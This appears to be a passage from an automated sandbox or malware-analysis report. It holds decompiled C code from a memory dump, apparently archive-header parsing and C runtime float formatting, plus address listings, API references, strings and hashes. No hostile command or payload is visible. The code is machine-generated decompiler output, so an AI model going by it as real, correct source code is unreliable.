													_t319 =  *(_t544 + 0x60);
													__eflags =  *(_t544 + 0x60) - 2;
													if( *(_t544 + 0x60) == 2) {
														L74:
														__eflags =  *(_t544 + 0x6b);
														if(__eflags != 0) {
															E00266BF5(__eflags, 0x1c, _t394 + 0x1e, _t522);
														}
														goto L84;
													}
													goto L72;
												}
											}
										}
										__eflags = _t290 - _t502;
										if(_t290 > _t502) {
											goto L52;
										}
										goto L51;
									}
								}
								__eflags = _t500 - 4;
								if(_t500 == 4) {
									_t470 = 5;
									memcpy(_t394 + 0x2248, _t394 + 0x21e4, _t470 << 2);
									_t331 = E0026C39E(_t500);
									__eflags = _t331;
									if(_t331 == 0) {
										 *(_t394 + 0x225c) = E0026C39E(_t500) & 0x00000001;
										_t335 = E0026C251(_t544 + 0x30) & 0x000000ff;
										 *(_t394 + 0x2260) = _t335;
										__eflags = _t335 - 0x18;
										if(_t335 <= 0x18) {
											E0026C300(_t544 + 0x30, _t394 + 0x2264, 0x10);
											__eflags =  *(_t394 + 0x225c);
											if( *(_t394 + 0x225c) != 0) {
												E0026C300(_t544 + 0x30, _t394 + 0x2274, 8);
												E0026C300(_t544 + 0x30, _t544 + 0x64, 4);
												E0026F524(_t544 - 0x74);
												E0026F56A(_t544 - 0x74, _t394 + 0x2274, 8);
												_push(_t544 + 8);
												E0026F435(_t544 - 0x74);
												_t350 = E0027F3CA(_t544 + 0x64, _t544 + 8, 4);
												asm("sbb al, al");
												_t352 =  ~_t350 + 1;
												__eflags = _t352;
												 *(_t394 + 0x225c) = _t352;
											}
											 *((char*)(_t394 + 0x6cbc)) = 1;
											goto L84;
										}
										_push(_t335);
										_push(L"hc%u");
										L40:
										_push(0x14);
										_push(_t544);
										E00263E41();
										E00263DEC(_t394, _t394 + 0x1e, _t544);
										goto L86;
									}
									_push(_t331);
									_push(L"h%u");
									goto L40;
								}
								__eflags = _t500 - 5;
								if(_t500 == 5) {
									_t479 = _t500;
									memcpy(_t394 + 0x4590, _t394 + 0x21e4, _t479 << 2);
									 *(_t394 + 0x45ac) = E0026C39E(_t500) & 0x00000001;
									 *((short*)(_t394 + 0x45ae)) = 0;
									 *((char*)(_t394 + 0x45ad)) = 0;
								}
								goto L84;
							}
							_t484 = E0026C39E(_t498);
							 *(_t544 + 0x54) = _t498;
							_t256 = 0;
							 *(_t544 + 0x58) = _t484;
							__eflags = _t498;
							if(__eflags < 0) {
								goto L30;
							}
							if(__eflags > 0) {
								goto L85;
							}
							__eflags = _t484 -  *(_t394 + 0x21f0);
							if(_t484 >=  *(_t394 + 0x21f0)) {
								goto L85;
							}
							goto L30;
						}
						E00261EF8(_t394);
						 *((char*)(_t394 + 0x6cc4)) = 1;
						E00266E03(0x2a00e0, 3);
						__eflags =  *((char*)(_t544 + 0x6a));
						if(__eflags == 0) {
							goto L26;
						} else {
							E00266BF5(__eflags, 4, _t394 + 0x1e, _t394 + 0x1e);
							 *((char*)(_t394 + 0x6cc5)) = 1;
							goto L86;
						}
					}
					L17:
					E00263DAB(_t394, _t498);
					goto L86;
				}
				_t498 =  *((intOrPtr*)(_t394 + 0x6cc0)) + 8;
				asm("adc eax, ecx");
				_t556 =  *((intOrPtr*)(_t394 + 0x6ca4));
				if(_t556 < 0 || _t556 <= 0 &&  *((intOrPtr*)(_t394 + 0x6ca0)) <= _t498) {
					goto L15;
				} else {
					_push(0x10);
					_push(_t544 + 0x18);
					 *((char*)(_t544 + 0x6a)) = 1;
					if( *((intOrPtr*)( *_t394 + 0xc))() != 0x10) {
						goto L17;
					}
					if( *((char*)( *((intOrPtr*)(_t394 + 0x21bc)) + 0x5124)) != 0) {
						L7:
						 *(_t544 + 0x6b) = 1;
						L8:
						E00263C40(_t394);
						_t529 = _t394 + 0x2264;
						_t543 = _t394 + 0x1024;
						E0026607D(_t543, 0, 5,  *((intOrPtr*)(_t394 + 0x21bc)) + 0x5024, _t394 + 0x2264, _t544 + 0x18,  *(_t394 + 0x2260), 0, _t544 + 0x28);
						if( *(_t394 + 0x225c) == 0) {
							L13:
							 *((intOrPtr*)(_t544 + 0x50)) = _t543;
							goto L16;
						} else {
							_t378 = _t394 + 0x2274;
							while(1) {
								_t380 = E0027F3CA(_t544 + 0x28, _t378, 8);
								_t546 = _t546 + 0xc;
								if(_t380 == 0) {
									goto L13;
								}
								_t563 =  *(_t544 + 0x6b);
								_t381 = _t394 + 0x1e;
								_push(_t381);
								_push(_t381);
								if( *(_t544 + 0x6b) != 0) {
									_push(6);
									E00266BF5(__eflags);
									 *((char*)(_t394 + 0x6cc5)) = 1;
									E00266E03(0x2a00e0, 0xb);
									goto L86;
								}
								_push(0x7d);
								E00266BF5(_t563);
								E0026E797( *((intOrPtr*)(_t394 + 0x21bc)) + 0x5024);
								E00263C40(_t394);
								E0026607D(_t543, 0, 5,  *((intOrPtr*)(_t394 + 0x21bc)) + 0x5024, _t529, _t544 + 0x18,  *(_t394 + 0x2260), 0, _t544 + 0x28);
								_t378 = _t394 + 0x2274;
								if( *(_t394 + 0x225c) != 0) {
									continue;
								}
								goto L13;
							}
							goto L13;
						}
					}
					_t392 = E00270FBA();
					 *(_t544 + 0x6b) = 0;
					if(_t392 == 0) {
						goto L8;
					}
					goto L7;
				}
			}

0x002630fc
0x002630fd
0x00263105
0x0026310f
0x00263116
0x0026311d
0x00263124
0x00263127
0x00263130
0x00263279
0x00263279
0x0026327c
0x00263289
0x0026329a
0x002632a1
0x002632b1
0x002632bb
0x002632bd
0x002632c4
0x002632c6
0x002638f6
0x002638f8
0x002638fd
0x00263900
0x0026390e
0x00263919
0x00263919
0x002632cc
0x002632ce
0x00000000
0x00000000
0x002632d4
0x002632da
0x002632dc
0x002632dc
0x002632de
0x002632e1
0x00000000
0x00000000
0x002632e7
0x002632ea
0x00000000
0x00000000
0x002632f4
0x002632f9
0x002632fc
0x00000000
0x00000000
0x00263301
0x00263313
0x00263319
0x0026331e
0x00263329
0x0026332b
0x00263334
0x0026333a
0x00263340
0x00263346
0x00263349
0x0026334c
0x0026334e
0x00263388
0x00263388
0x0026338a
0x00263391
0x00263394
0x00263397
0x002633c1
0x002633c1
0x002633c8
0x002633ca
0x002633cd
0x002633d0
0x002633d5
0x002633da
0x002633dc
0x002633df
0x002633df
0x002633ea
0x002633f7
0x00263406
0x0026340f
0x00263417
0x0026341e
0x00263424
0x00263426
0x00263837
0x00263846
0x00263847
0x00263851
0x0026385a
0x00263867
0x00263876
0x00263881
0x00263884
0x0026388a
0x00263890
0x00263892
0x00263898
0x0026389b
0x002638b2
0x0026389d
0x002638a5
0x002638ad
0x002638af
0x002638af
0x002638b8
0x002638bf
0x002638c9
0x002638c9
0x00000000
0x002638c1
0x002638c1
0x002638c7
0x002638cb
0x002638cb
0x002638d1
0x002638d6
0x002638d9
0x002638e9
0x002638e9
0x002638ee
0x002638f1
0x00000000
0x002638f1
0x00000000
0x002638c7
0x002638bf
0x0026342c
0x00000000
0x00000000
0x00263432
0x00263435
0x00263577
0x0026357f
0x0026358e
0x00263592
0x00263595
0x0026359c
0x002635a3
0x002635ae
0x002635b1
0x002635b7
0x002635c0
0x002635c7
0x002635d5
0x002635e0
0x002635ef
0x002635ef
0x002635f1
0x002635f7
0x002635fd
0x00263604
0x0026360a
0x0026360a
0x00263610
0x00263616
0x0026361c
0x00263622
0x00263628
0x0026362a
0x00263632
0x00263632
0x00263634
0x00000000
0x0026362c
0x0026362c
0x00263636
0x00263636
0x0026363f
0x00263645
0x0026364a
0x00263651
0x00263654
0x00263667
0x00263667
0x0026366c
0x00263673
0x0026367a
0x0026367f
0x0026368e
0x0026368e
0x00263694
0x0026369e
0x002636a5
0x002636ae
0x002636b6
0x002636b9
0x002636bc
0x002636bf
0x002636c1
0x002636c1
0x002636d3
0x002636e7
0x002636e9
0x002636f3
0x002636f8
0x002636fe
0x00263700
0x0026370a
0x0026370c
0x0026370e
0x0026370e
0x0026370e
0x0026370e
0x00263702
0x00263702
0x00263702
0x00263715
0x0026371f
0x00263731
0x00263737
0x0026373b
0x0026373e
0x00263744
0x0026374f
0x0026374f
0x0026374f
0x00000000
0x00263746
0x00263746
0x00263749
0x00000000
0x00000000
0x0026374b
0x00263751
0x00263751
0x0026375d
0x00263762
0x00263777
0x0026377d
0x0026378c
0x00263791
0x0026379c
0x0026379e
0x002637a0
0x002637a0
0x002637ad
0x002637b2
0x002637c0
0x002637c5
0x002637c8
0x002637c9
0x002637ca
0x002637cf
0x002637d4
0x002637d7
0x002637e1
0x002637e1
0x002637e6
0x002637e9
0x002637ec
0x002637fe
0x00263804
0x0026380b
0x0026380d
0x0026380f
0x0026380f
0x00000000
0x002637ee
0x002637f1
0x002637f6
0x002637f9
0x002637fc
0x00263816
0x00263816
0x0026381a
0x00263827
0x00263827
0x00000000
0x0026381a
0x00000000
0x002637fc
0x002637ec
0x00263744
0x0026362e
0x00263630
0x00000000
0x00000000
0x00000000
0x00263630
0x0026362a
0x0026343b
0x0026343e
0x0026347f
0x0026348c
0x00263491
0x00263496
0x00263498
0x002634cf
0x002634da
0x002634dd
0x002634e3
0x002634e6
0x002634fc
0x00263501
0x00263508
0x00263516
0x00263524
0x0026352d
0x00263539
0x00263541
0x00263546
0x00263555
0x0026355f
0x00263561
0x00263561
0x00263563
0x00263563
0x00263569
0x00000000
0x00263569
0x002634e8
0x002634e9
0x002634a0
0x002634a3
0x002634a5
0x002634a6
0x002634b8
0x00000000
0x002634b8
0x0026349a
0x0026349b
0x00000000
0x0026349b
0x00263440
0x00263443
0x0026344a
0x00263457
0x00263463
0x0026346b
0x00263472
0x00263472
0x00000000
0x00263443
0x002633a1
0x002633a3
0x002633a6
0x002633a8
0x002633ab
0x002633ad
0x00000000
0x00000000
0x002633af
0x00000000
0x00000000
0x002633b5
0x002633bb
0x00000000
0x00000000
0x00000000
0x002633bb
0x00263352
0x0026335e
0x00263365
0x0026336a
0x0026336e
0x00000000
0x00263370
0x00263377
0x0026337c
0x00000000
0x0026337c
0x0026336e
0x0026328b
0x0026328d
0x00000000
0x0026328d
0x0026313e
0x00263141
0x00263143
0x00263149
0x00000000
0x0026315d
0x00263162
0x00263164
0x00263167
0x00263171
0x00000000
0x00000000
0x00263184
0x00263193
0x00263193
0x00263197
0x00263199
0x002631b5
0x002631c1
0x002631cd
0x002631d9
0x00263255
0x00263255
0x00000000
0x002631db
0x002631db
0x002631e1
0x002631e8
0x002631ed
0x002631f2
0x00000000
0x00000000
0x002631f4
0x002631f8
0x002631fb
0x002631fc
0x002631fd
0x0026325a
0x0026325c
0x00263268
0x0026326f
0x00000000
0x0026326f
0x002631ff
0x00263201
0x00263212
0x00263219
0x00263241
0x0026324d
0x00263253
0x00000000
0x00000000
0x00000000
0x00263253
0x00000000
0x002631e1
0x002631d9
0x00263186
0x0026318b
0x00263191
0x00000000
0x00000000
0x00000000
0x00263191

APIs

__EH_prolog.LIBCMT ref: 00263105
_memcmp.LIBVCRUNTIME ref: 002631E8

Strings

CMT, xrefs: 002637FE
hc%u, xrefs: 002634E9
h%u, xrefs: 0026349B

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog_memcmp
String ID: CMT$h%u$hc%u
API String ID: 3004599000-3282847064
Opcode ID: 2ab552d8f856123dc20dbcb20cb69c53dab2bbc0ecd007bb32519ec9cf6fd28d
Instruction ID: 8c62001978ca11abc0189df370e4a7dd6c329a8d3c032ae1db85ffb7e09ea967
Opcode Fuzzy Hash: 2ab552d8f856123dc20dbcb20cb69c53dab2bbc0ecd007bb32519ec9cf6fd28d
Instruction Fuzzy Hash: 4A32A3715203859FDF18DF74C895AEA37A5AF55300F04447DFD8ACB286DB70AAA8CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0028C55E, Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381
COMMONCrypto

Download Yara Rule

C-Code - Quality: 68%

			E0028C55E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v32;
				signed int _v36;
				char _v460;
				signed int _v464;
				void _v468;
				signed int _v472;
				signed int _v932;
				signed int _v936;
				signed int _v1392;
				signed int _v1396;
				signed int _v1400;
				char _v1860;
				signed int _v1864;
				signed int _v1865;
				signed int _v1872;
				signed int _v1876;
				signed int _v1880;
				signed int _v1884;
				signed int _v1888;
				signed int _v1892;
				signed int _v1896;
				intOrPtr _v1900;
				signed int _v1904;
				signed int _v1908;
				signed int _v1912;
				signed int _v1916;
				signed int _v1920;
				signed int _v1924;
				signed int _v1928;
				char _v1936;
				char _v1944;
				char _v2404;
				signed int _v2408;
				signed int _t743;
				signed int _t753;
				signed int _t754;
				intOrPtr _t763;
				signed int _t764;
				intOrPtr _t767;
				intOrPtr _t770;
				intOrPtr _t772;
				intOrPtr _t773;
				void* _t774;
				signed int _t777;
				signed int _t778;
				signed int _t784;
				signed int _t790;
				intOrPtr _t792;
				void* _t793;
				signed int _t794;
				signed int _t795;
				signed int _t796;
				signed int _t805;
				signed int _t810;
				signed int _t811;
				signed int _t812;
				signed int _t815;
				signed int _t816;
				signed int _t817;
				signed int _t819;
				signed int _t820;
				signed int _t825;
				signed int _t826;
				signed int _t832;
				signed int _t833;
				signed int _t836;
				signed int _t841;
				signed int _t849;
				signed int* _t852;
				signed int _t856;
				signed int _t867;
				signed int _t868;
				signed int _t870;
				char* _t871;
				signed int _t874;
				signed int _t878;
				signed int _t879;
				signed int _t884;
				signed int _t886;
				signed int _t891;
				signed int _t900;
				signed int _t903;
				signed int _t905;
				signed int _t908;
				signed int _t909;
				signed int _t910;
				signed int _t913;
				signed int _t926;
				signed int _t927;
				signed int _t929;
				char* _t930;
				signed int _t933;
				signed int _t937;
				signed int _t938;
				signed int* _t940;
				signed int _t943;
				signed int _t945;
				signed int _t950;
				signed int _t958;
				signed int _t961;
				signed int _t965;
				signed int* _t972;
				intOrPtr _t974;
				void* _t975;
				intOrPtr* _t977;
				signed int* _t981;
				unsigned int _t992;
				signed int _t993;
				void* _t996;
				signed int _t997;
				void* _t999;
				signed int _t1000;
				signed int _t1001;
				signed int _t1002;
				signed int _t1012;
				signed int _t1017;
				signed int _t1020;
				unsigned int _t1023;
				signed int _t1024;
				void* _t1027;
				signed int _t1028;
				void* _t1030;
				signed int _t1031;
				signed int _t1032;
				signed int _t1033;
				signed int _t1038;
				signed int* _t1043;
				signed int _t1045;
				signed int _t1055;
				void _t1058;
				signed int _t1061;
				void* _t1064;
				void* _t1071;
				signed int _t1077;
				signed int _t1078;
				signed int _t1081;
				signed int _t1082;
				signed int _t1084;
				signed int _t1085;
				signed int _t1086;
				signed int _t1090;
				signed int _t1094;
				signed int _t1095;
				signed int _t1096;
				signed int _t1098;
				signed int _t1099;
				signed int _t1100;
				signed int _t1101;
				signed int _t1102;
				signed int _t1103;
				signed int _t1105;
				signed int _t1106;
				signed int _t1107;
				signed int _t1108;
				signed int _t1109;
				signed int _t1110;
				unsigned int _t1111;
				void* _t1114;
				intOrPtr _t1116;
				signed int _t1117;
				signed int _t1118;
				signed int _t1119;
				signed int* _t1123;
				void* _t1127;
				void* _t1128;
				signed int _t1129;
				signed int _t1130;
				signed int _t1131;
				signed int _t1134;
				signed int _t1135;
				signed int _t1140;
				void* _t1142;
				signed int _t1143;
				signed int _t1146;
				char _t1151;
				signed int _t1153;
				signed int _t1154;
				signed int _t1155;
				signed int _t1156;
				signed int _t1157;
				signed int _t1158;
				signed int _t1159;
				signed int _t1163;
				signed int _t1164;
				signed int _t1165;
				signed int _t1166;
				signed int _t1167;
				unsigned int _t1170;
				void* _t1174;
				void* _t1175;
				unsigned int _t1176;
				signed int _t1181;
				signed int _t1182;
				signed int _t1184;
				signed int _t1185;
				intOrPtr* _t1187;
				signed int _t1188;
				signed int _t1190;
				signed int _t1191;
				signed int _t1194;
				signed int _t1196;
				signed int _t1197;
				void* _t1198;
				signed int _t1199;
				signed int _t1200;
				signed int _t1201;
				void* _t1204;
				signed int _t1205;
				signed int _t1206;
				signed int _t1207;
				signed int _t1208;
				signed int _t1209;
				signed int* _t1212;
				signed int _t1213;
				signed int _t1214;
				signed int _t1215;
				signed int _t1216;
				intOrPtr* _t1218;
				intOrPtr* _t1219;
				signed int _t1221;
				signed int _t1223;
				signed int _t1226;
				signed int _t1232;
				signed int _t1236;
				signed int _t1237;
				signed int _t1242;
				signed int _t1245;
				signed int _t1246;
				signed int _t1247;
				signed int _t1248;
				signed int _t1249;
				signed int _t1250;
				signed int _t1252;
				signed int _t1253;
				signed int _t1254;
				signed int _t1255;
				signed int _t1257;
				signed int _t1258;
				signed int _t1259;
				signed int _t1260;
				signed int _t1261;
				signed int _t1263;
				signed int _t1264;
				signed int _t1266;
				signed int _t1268;
				signed int _t1270;
				signed int _t1273;
				signed int _t1275;
				signed int* _t1276;
				signed int* _t1279;
				signed int _t1288;

				_t1142 = __edx;
				_t1273 = _t1275;
				_t1276 = _t1275 - 0x964;
				_t743 =  *0x29d668; // 0xd26a0a57
				_v8 = _t743 ^ _t1273;
				_t1055 = _a20;
				_push(__esi);
				_push(__edi);
				_t1187 = _a16;
				_v1924 = _t1187;
				_v1920 = _t1055;
				E0028C078( &_v1944, __eflags);
				_t1236 = _a8;
				_t748 = 0x2d;
				if((_t1236 & 0x80000000) == 0) {
					_t748 = 0x120;
				}
				 *_t1187 = _t748;
				 *((intOrPtr*)(_t1187 + 8)) = _t1055;
				_t1188 = _a4;
				if((_t1236 & 0x7ff00000) != 0) {
					L5:
					_t753 = E002886BF( &_a4);
					_pop(_t1070);
					__eflags = _t753;
					if(_t753 != 0) {
						_t1070 = _v1924;
						 *((intOrPtr*)(_v1924 + 4)) = 1;
					}
					_t754 = _t753 - 1;
					__eflags = _t754;
					if(_t754 == 0) {
						_push("1#INF");
						goto L308;
					} else {
						_t777 = _t754 - 1;
						__eflags = _t777;
						if(_t777 == 0) {
							_push("1#QNAN");
							goto L308;
						} else {
							_t778 = _t777 - 1;
							__eflags = _t778;
							if(_t778 == 0) {
								_push("1#SNAN");
								goto L308;
							} else {
								__eflags = _t778 == 1;
								if(_t778 == 1) {
									_push("1#IND");
									goto L308;
								} else {
									_v1928 = _v1928 & 0x00000000;
									_a4 = _t1188;
									_a8 = _t1236 & 0x7fffffff;
									_t1288 = _a4;
									asm("fst qword [ebp-0x768]");
									_t1190 = _v1896;
									_v1916 = _a12 + 1;
									_t1077 = _t1190 >> 0x14;
									_t784 = _t1077 & 0x000007ff;
									__eflags = _t784;
									if(_t784 != 0) {
										_t1143 = 0;
										_t784 = 0;
										__eflags = 0;
									} else {
										_t1143 = 1;
									}
									_t1191 = _t1190 & 0x000fffff;
									_t1058 = _v1900 + _t784;
									asm("adc edi, esi");
									__eflags = _t1143;
									_t1078 = _t1077 & 0x000007ff;
									_t1242 = _t1078 - 0x434 + (0 | _t1143 != 0x00000000) + 1;
									_v1872 = _t1242;
									E0028E0C0(_t1078, _t1288);
									_push(_t1078);
									_push(_t1078);
									 *_t1276 = _t1288;
									_t790 = E00290F10(E0028E1D0(_t1191, _t1242), _t1288);
									_v1904 = _t790;
									__eflags = _t790 - 0x7fffffff;
									if(_t790 == 0x7fffffff) {
										L16:
										__eflags = 0;
										_v1904 = 0;
									} else {
										__eflags = _t790 - 0x80000000;
										if(_t790 == 0x80000000) {
											goto L16;
										}
									}
									_v468 = _t1058;
									__eflags = _t1191;
									_v464 = _t1191;
									_t1061 = (0 | _t1191 != 0x00000000) + 1;
									_v472 = _t1061;
									__eflags = _t1242;
									if(_t1242 < 0) {
										__eflags = _t1242 - 0xfffffc02;
										if(_t1242 == 0xfffffc02) {
											L101:
											_t792 =  *((intOrPtr*)(_t1273 + _t1061 * 4 - 0x1d4));
											_t195 =  &_v1896;
											 *_t195 = _v1896 & 0x00000000;
											__eflags =  *_t195;
											asm("bsr eax, eax");
											if( *_t195 == 0) {
												_t1081 = 0;
												__eflags = 0;
											} else {
												_t1081 = _t792 + 1;
											}
											_t793 = 0x20;
											_t794 = _t793 - _t1081;
											__eflags = _t794 - 1;
											_t795 = _t794 & 0xffffff00 | _t794 - 0x00000001 > 0x00000000;
											__eflags = _t1061 - 0x73;
											_v1865 = _t795;
											_t1082 = _t1081 & 0xffffff00 | _t1061 - 0x00000073 > 0x00000000;
											__eflags = _t1061 - 0x73;
											if(_t1061 != 0x73) {
												L107:
												_t796 = 0;
												__eflags = 0;
											} else {
												__eflags = _t795;
												if(_t795 == 0) {
													goto L107;
												} else {
													_t796 = 1;
												}
											}
											__eflags = _t1082;
											if(_t1082 != 0) {
												L126:
												_v1400 = _v1400 & 0x00000000;
												_t224 =  &_v472;
												 *_t224 = _v472 & 0x00000000;
												__eflags =  *_t224;
												E0028AA64( &_v468, 0x1cc,  &_v1396, 0);
												_t1276 =  &(_t1276[4]);
											} else {
												__eflags = _t796;
												if(_t796 != 0) {
													goto L126;
												} else {
													_t1109 = 0x72;
													__eflags = _t1061 - _t1109;
													if(_t1061 < _t1109) {
														_t1109 = _t1061;
													}
													__eflags = _t1109 - 0xffffffff;
													if(_t1109 != 0xffffffff) {
														_t1260 = _t1109;
														_t1218 =  &_v468 + _t1109 * 4;
														_v1880 = _t1218;
														while(1) {
															__eflags = _t1260 - _t1061;
															if(_t1260 >= _t1061) {
																_t208 =  &_v1876;
																 *_t208 = _v1876 & 0x00000000;
																__eflags =  *_t208;
															} else {
																_v1876 =  *_t1218;
															}
															_t210 = _t1260 - 1; // 0x70
															__eflags = _t210 - _t1061;
															if(_t210 >= _t1061) {
																_t1170 = 0;
																__eflags = 0;
															} else {
																_t1170 =  *(_t1218 - 4);
															}
															_t1218 = _t1218 - 4;
															_t972 = _v1880;
															_t1260 = _t1260 - 1;
															 *_t972 = _t1170 >> 0x0000001f ^ _v1876 + _v1876;
															_v1880 = _t972 - 4;
															__eflags = _t1260 - 0xffffffff;
															if(_t1260 == 0xffffffff) {
																break;
															}
															_t1061 = _v472;
														}
														_t1242 = _v1872;
													}
													__eflags = _v1865;
													if(_v1865 == 0) {
														_v472 = _t1109;
													} else {
														_t218 = _t1109 + 1; // 0x73
														_v472 = _t218;
													}
												}
											}
											_t1194 = 1 - _t1242;
											E0027E920(_t1194,  &_v1396, 0, 1);
											__eflags = 1;
											 *(_t1273 + 0xbad63d) = 1 << (_t1194 & 0x0000001f);
											_t805 = 0xbadbae;
										} else {
											_v1396 = _v1396 & 0x00000000;
											_t1110 = 2;
											_v1392 = 0x100000;
											_v1400 = _t1110;
											__eflags = _t1061 - _t1110;
											if(_t1061 == _t1110) {
												_t1174 = 0;
												__eflags = 0;
												while(1) {
													_t974 =  *((intOrPtr*)(_t1273 + _t1174 - 0x570));
													__eflags = _t974 -  *((intOrPtr*)(_t1273 + _t1174 - 0x1d0));
													if(_t974 !=  *((intOrPtr*)(_t1273 + _t1174 - 0x1d0))) {
														goto L101;
													}
													_t1174 = _t1174 + 4;
													__eflags = _t1174 - 8;
													if(_t1174 != 8) {
														continue;
													} else {
														_t166 =  &_v1896;
														 *_t166 = _v1896 & 0x00000000;
														__eflags =  *_t166;
														asm("bsr eax, edi");
														if( *_t166 == 0) {
															_t1175 = 0;
															__eflags = 0;
														} else {
															_t1175 = _t974 + 1;
														}
														_t975 = 0x20;
														_t1261 = _t1110;
														__eflags = _t975 - _t1175 - _t1110;
														_t977 =  &_v460;
														_v1880 = _t977;
														_t1219 = _t977;
														_t171 =  &_v1865;
														 *_t171 = _t975 - _t1175 - _t1110 > 0;
														__eflags =  *_t171;
														while(1) {
															__eflags = _t1261 - _t1061;
															if(_t1261 >= _t1061) {
																_t173 =  &_v1876;
																 *_t173 = _v1876 & 0x00000000;
																__eflags =  *_t173;
															} else {
																_v1876 =  *_t1219;
															}
															_t175 = _t1261 - 1; // 0x0
															__eflags = _t175 - _t1061;
															if(_t175 >= _t1061) {
																_t1176 = 0;
																__eflags = 0;
															} else {
																_t1176 =  *(_t1219 - 4);
															}
															_t1219 = _t1219 - 4;
															_t981 = _v1880;
															_t1261 = _t1261 - 1;
															 *_t981 = _t1176 >> 0x0000001e ^ _v1876 << 0x00000002;
															_v1880 = _t981 - 4;
															__eflags = _t1261 - 0xffffffff;
															if(_t1261 == 0xffffffff) {
																break;
															}
															_t1061 = _v472;
														}
														__eflags = _v1865;
														_t1111 = _t1110 - _v1872;
														_v472 = (0 | _v1865 != 0x00000000) + _t1110;
														_t1221 = _t1111 >> 5;
														_v1884 = _t1111;
														_t1263 = _t1221 << 2;
														E0027E920(_t1221,  &_v1396, 0, _t1263);
														 *(_t1273 + _t1263 - 0x570) = 1 << (_v1884 & 0x0000001f);
														_t805 = _t1221 + 1;
													}
													goto L128;
												}
											}
											goto L101;
										}
										L128:
										_v1400 = _t805;
										_t1064 = 0x1cc;
										_v936 = _t805;
										__eflags = _t805 << 2;
										E0028AA64( &_v932, 0x1cc,  &_v1396, _t805 << 2);
										_t1279 =  &(_t1276[7]);
									} else {
										_v1396 = _v1396 & 0x00000000;
										_t1264 = 2;
										_v1392 = 0x100000;
										_v1400 = _t1264;
										__eflags = _t1061 - _t1264;
										if(_t1061 != _t1264) {
											L53:
											_t992 = _v1872 + 1;
											_t993 = _t992 & 0x0000001f;
											_t1114 = 0x20;
											_v1876 = _t993;
											_t1223 = _t992 >> 5;
											_v1872 = _t1223;
											_v1908 = _t1114 - _t993;
											_t996 = E0027DDA0(1, _t1114 - _t993, 0);
											_t1116 =  *((intOrPtr*)(_t1273 + _t1061 * 4 - 0x1d4));
											_t997 = _t996 - 1;
											_t108 =  &_v1896;
											 *_t108 = _v1896 & 0x00000000;
											__eflags =  *_t108;
											asm("bsr ecx, ecx");
											_v1884 = _t997;
											_v1912 =  !_t997;
											if( *_t108 == 0) {
												_t1117 = 0;
												__eflags = 0;
											} else {
												_t1117 = _t1116 + 1;
											}
											_t999 = 0x20;
											_t1000 = _t999 - _t1117;
											_t1181 = _t1061 + _t1223;
											__eflags = _v1876 - _t1000;
											_v1892 = _t1181;
											_t1001 = _t1000 & 0xffffff00 | _v1876 - _t1000 > 0x00000000;
											__eflags = _t1181 - 0x73;
											_v1865 = _t1001;
											_t1118 = _t1117 & 0xffffff00 | _t1181 - 0x00000073 > 0x00000000;
											__eflags = _t1181 - 0x73;
											if(_t1181 != 0x73) {
												L59:
												_t1002 = 0;
												__eflags = 0;
											} else {
												__eflags = _t1001;
												if(_t1001 == 0) {
													goto L59;
												} else {
													_t1002 = 1;
												}
											}
											__eflags = _t1118;
											if(_t1118 != 0) {
												L81:
												__eflags = 0;
												_t1064 = 0x1cc;
												_v1400 = 0;
												_v472 = 0;
												E0028AA64( &_v468, 0x1cc,  &_v1396, 0);
												_t1276 =  &(_t1276[4]);
											} else {
												__eflags = _t1002;
												if(_t1002 != 0) {
													goto L81;
												} else {
													_t1119 = 0x72;
													__eflags = _t1181 - _t1119;
													if(_t1181 >= _t1119) {
														_t1181 = _t1119;
														_v1892 = _t1119;
													}
													_t1012 = _t1181;
													_v1880 = _t1012;
													__eflags = _t1181 - 0xffffffff;
													if(_t1181 != 0xffffffff) {
														_t1182 = _v1872;
														_t1266 = _t1181 - _t1182;
														__eflags = _t1266;
														_t1123 =  &_v468 + _t1266 * 4;
														_v1888 = _t1123;
														while(1) {
															__eflags = _t1012 - _t1182;
															if(_t1012 < _t1182) {
																break;
															}
															__eflags = _t1266 - _t1061;
															if(_t1266 >= _t1061) {
																_t1226 = 0;
																__eflags = 0;
															} else {
																_t1226 =  *_t1123;
															}
															__eflags = _t1266 - 1 - _t1061;
															if(_t1266 - 1 >= _t1061) {
																_t1017 = 0;
																__eflags = 0;
															} else {
																_t1017 =  *(_t1123 - 4);
															}
															_t1020 = _v1880;
															_t1123 = _v1888 - 4;
															_v1888 = _t1123;
															 *(_t1273 + _t1020 * 4 - 0x1d0) = (_t1226 & _v1884) << _v1876 | (_t1017 & _v1912) >> _v1908;
															_t1012 = _t1020 - 1;
															_t1266 = _t1266 - 1;
															_v1880 = _t1012;
															__eflags = _t1012 - 0xffffffff;
															if(_t1012 != 0xffffffff) {
																_t1061 = _v472;
																continue;
															}
															break;
														}
														_t1181 = _v1892;
														_t1223 = _v1872;
														_t1264 = 2;
													}
													__eflags = _t1223;
													if(_t1223 != 0) {
														__eflags = 0;
														memset( &_v468, 0, _t1223 << 2);
														_t1276 =  &(_t1276[3]);
													}
													__eflags = _v1865;
													_t1064 = 0x1cc;
													if(_v1865 == 0) {
														_v472 = _t1181;
													} else {
														_v472 = _t1181 + 1;
													}
												}
											}
											_v1392 = _v1392 & 0x00000000;
											_v1396 = _t1264;
											_v1400 = 1;
											_v936 = 1;
											_push(4);
										} else {
											_t1127 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *((intOrPtr*)(_t1273 + _t1127 - 0x570)) -  *((intOrPtr*)(_t1273 + _t1127 - 0x1d0));
												if( *((intOrPtr*)(_t1273 + _t1127 - 0x570)) !=  *((intOrPtr*)(_t1273 + _t1127 - 0x1d0))) {
													goto L53;
												}
												_t1127 = _t1127 + 4;
												__eflags = _t1127 - 8;
												if(_t1127 != 8) {
													continue;
												} else {
													_t1023 = _v1872 + 2;
